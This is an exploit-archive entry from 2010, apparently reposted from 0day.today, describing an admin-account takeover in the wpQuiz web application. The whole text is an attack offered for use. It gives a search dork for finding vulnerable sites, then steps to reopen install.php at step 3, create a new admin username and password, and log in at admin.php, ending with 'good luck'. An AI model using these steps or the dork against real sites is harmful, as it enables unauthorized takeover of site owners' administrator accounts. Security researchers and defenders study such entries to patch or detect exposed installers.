id: 14143
date: 09/22/2010
title: Powered by wpQuiz (install) Change Password Vulnerability
author: wlhaan Hacker
cves: 

=========================================================
Powered by wpQuiz (install) Change Password Vulnerability
=========================================================

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : n/a #
# [+]  team wlhaan Hacker     #
# [+]  dork:""Powered by wpQuiz""
#####################################################
 
The exploit :

 http://localhost/path/install.php

and go to install  3

http://localhost/path/install.php?step=3

now add

Username:      
Password:     
E-mail:

After the piece login admin

http://localhost/path/admin.php
 

and good luck :D
 
Thanks to : shooq hacker ..



#  0day.today [2023-03-23]  #